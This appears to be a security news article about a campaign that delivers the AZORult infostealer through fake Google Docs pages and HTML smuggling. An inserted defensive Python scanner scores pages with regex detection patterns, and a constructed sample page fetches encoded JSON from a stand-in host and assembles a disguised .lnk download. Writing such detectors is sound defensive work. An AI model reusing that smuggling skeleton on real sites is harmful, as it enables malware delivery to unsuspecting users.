
New Malware Campaign Uses Fake Google Sites and HTML Smuggling for AZORult Distribution

A recent report from cybersecurity researchers revealed the discovery of a new campaign that uses fake Google Sites pages and HTML smuggling to propagate a commercial malware called AZORult. The campaign, not attributed to any specific threat actor or group, is designed to collect sensitive data for sale on underground forums.

According to Netskope Threat Labs researcher Jan Michael Alcantara, the campaign uses an unconventional HTML smuggling technique, in which the malicious payload is concealed within a separate JSON file hosted on an external website. The method is a stealthy way of exploiting legitimate HTML5 and JavaScript features to assemble and launch the malware by “smuggling” an encoded malicious script. This allows the malware to bypass typical security controls, such as email gateways, which inspect only for suspicious attachments.
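The following is an added example, not code from the original report or from Netskope: a heuristic scanner that scores an HTML page for the indicators described above (an external JSON fetch, base64 decoding, Blob assembly, a forced download, and a shortcut-file name). The indicator names, weights, threshold and both sample pages are constructed for this illustration.

```python
import re

# Weighted indicators of the HTML-smuggling variant described above.
# A page that combines several of them is flagged for analyst review.
INDICATORS = {
    "external_json_fetch": (re.compile(r"fetch\(\s*['\"]https?://[^'\"]+\.json['\"]", re.I), 3),
    "base64_decode":       (re.compile(r"\batob\s*\(", re.I), 2),
    "blob_assembly":       (re.compile(r"new\s+Blob\s*\(", re.I), 2),
    "object_url":          (re.compile(r"URL\.createObjectURL\s*\(", re.I), 2),
    "forced_download":     (re.compile(r"\.download\s*=|download\s*=\s*['\"]", re.I), 1),
    "lnk_filename":        (re.compile(r"\.lnk['\"]", re.I), 2),
}
THRESHOLD = 6  # constructed cut-off; tune against your own benign traffic


def score_html(html):
    """Return (score, [matched indicator names]) for one HTML document."""
    hits = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(html)]
    score = sum(INDICATORS[name][1] for name in hits)
    return score, hits


def is_suspected_smuggling(html):
    """True when the combined indicator weight reaches the review threshold."""
    return score_html(html)[0] >= THRESHOLD


# Constructed benign page: a normal download link plus a same-origin JSON call.
BENIGN_PAGE = """<html><body>
<a href="/reports/statement.pdf" download="statement.pdf">Download statement</a>
<script>fetch('/api/user.json').then(r => r.json()).then(console.log);</script>
</body></html>"""

# Constructed suspect fragment carrying the indicators (no real payload).
SUSPECT_PAGE = """<html><body><div id="captcha-gate">I am not a robot</div>
<script>
fetch("https://cdn.example.invalid/data.json")
  .then(r => r.json())
  .then(j => { const b = new Blob([atob(j.d)]);
               const a = document.createElement("a");
               a.href = URL.createObjectURL(b); a.download = "statement.pdf.lnk"; });
</script></body></html>"""

if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("suspect", SUSPECT_PAGE)):
        score, hits = score_html(page)
        print(f"{label}: score={score} flagged={is_suspected_smuggling(page)} hits={hits}")
```

Individual indicators such as `download=` occur on legitimate pages, which is why the scoring requires the combination rather than any single match.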

Once installed, AZORult, also known as PuffStealer and Ruzalto, can steal credentials, cookies, and browsing history from web browsers, take screenshots, and extract data from 137 cryptocurrency wallets. The latest attack activity involves the threat actor creating fake Google Docs pages on Google Sites that use HTML smuggling to deliver the payload.

The threat actor adds a CAPTCHA barrier to make the fake Google Docs page appear more legitimate. It also provides an additional layer of protection against URL scanners. The downloaded file is a shortcut file (.LNK) that appears to be a PDF bank statement. However, when opened, it executes a series of intermediate batch and PowerShell scripts from a compromised domain.

One of the PowerShell scripts, called “agent3.ps1,” is responsible for fetching the AZORult loader (“service.exe”), which then downloads and executes another PowerShell script (“sd2.ps1”) containing the actual AZORult malware. This fileless infostealer uses reflective code loading to evade detection and an AMSI bypass technique to avoid being detected by host-based anti-malware products, including Windows Defender.

In conclusion, this new AZORult campaign is a highly sophisticated and stealthy attempt to distribute malware and steal sensitive information. The threat actor can bypass traditional security measures and infect devices using HTML smuggling and other techniques. Individuals and organizations must remain vigilant and cautious when opening emails or clicking on links from unknown sources to avoid falling victim to such attacks.

Deitasoft © 2024. All Rights Reserved.